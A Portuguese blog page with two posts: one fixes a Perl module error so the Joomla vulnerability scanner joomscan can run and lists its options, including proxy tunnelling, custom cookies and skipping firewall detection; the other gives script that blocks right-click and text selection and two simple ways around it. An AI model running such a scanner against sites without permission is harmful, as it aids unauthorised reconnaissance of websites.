Can't locate Switch.pm in @INC (you may need to install the Switch module) (@INC contains: C:/Perl/site/lib C:/Perl/lib .) at C:\Users\cliente\Desktop\Joomla\joomscan.pl line 22.
BEGIN failed--compilation aborted at C:\Users\cliente\Desktop\Joomla\joomscan.pl line 22.

Para resolver o problema, abrimos o CMD e executamos os seguintes comandos:

cpan

install local::lib


install App:cpanminus

exit

cpanm

cpanm install -f Switch

joomscan.pl -u <string> -x proxy:port


E depois disso, basta olha as vulnerabilidades


Outras opções são listadas abaixo:

joomscan.pl -u <string> -x proxy:port
        -u <string>      = joomla Url
        
        ==Optional==
        -x <string:int>  = proXy to tunnel
        -c <string>      = cookie (name=value;)
        -g "<string>"   = desired useraGent string within "
        -nv              = No Version fingerprinting check
        -nf              = No Firewall detection check
        -nvf/-nfv        = No version+firewall check
        -pe              = Poking version only
                           (and Exit the scanner)
        -ot              = Output to Text file (target-joexploit.txt)
        -oh              = Output to Html file (target-joexploit.htm)
        -vu              = Verbose (output every Url scan)
        -sp              = Show completed Percentage

Ver mais
      edit

quarta-feira, 24 de fevereiro de 2016

Publicado quarta-feira, fevereiro 24, 2016 por com 0 comentário

Bular sites que proibem seleção e botão direito

Abaixo vou disponibilizar o código, mas não utilize-o como opção segurança, pois não vai adiantar nada se a pessoa estiver mal intencionada.

<!-- Bloquear botão direito do mouse  -->
<script>
    var mensagem = "";
    function clickIE() {
        if (document.all) {
            (mensagem);
            return false;
        }
    }
    function clickNS(e) {
        if (document.layers || (document.getElementById && !document.all)) {
            if (e.which == 2 || e.which == 3) {
                (mensagem);
                return false;
            }
        }
    }
    if (document.layers) {
        document.captureEvents(Event.MOUSEDOWN);
        document.onmousedown = clickNS;
    }
    else {
        document.onmouseup = clickNS;
        document.oncontextmenu = clickIE;
    }

    document.oncontextmenu = new Function("return false")
</script>


<!-- Bloquear seleção de texto do site -->
<style>
.no-select {
    -webkit-touch-callout: none;
    -webkit-user-select: none;
    -khtml-user-select: none;
    -moz-user-select: none;
    -ms-user-select: none;
    -o-user-select: none;
    user-select: none;
}
</style>

<body class="no-select">
</body>

Vou apresentar dois meio de burlar isso.

Alternativa 1
Apenas cole a URL do site na frente para traduzir e você vai poder selecionar o que quiser:
http://translate.google.com.br/translate?hl=pt-BR&sl=iw&tl=pt&u=

Alternativa 2
Todo navegador permite você salvar a página apertando (ctrl+s). Depois de salvar, basta executar o pagina.html ou pagina.htm no seu computador, ou apenas copiar um texto, ou ainda uma imagem.


Ver mais
      edit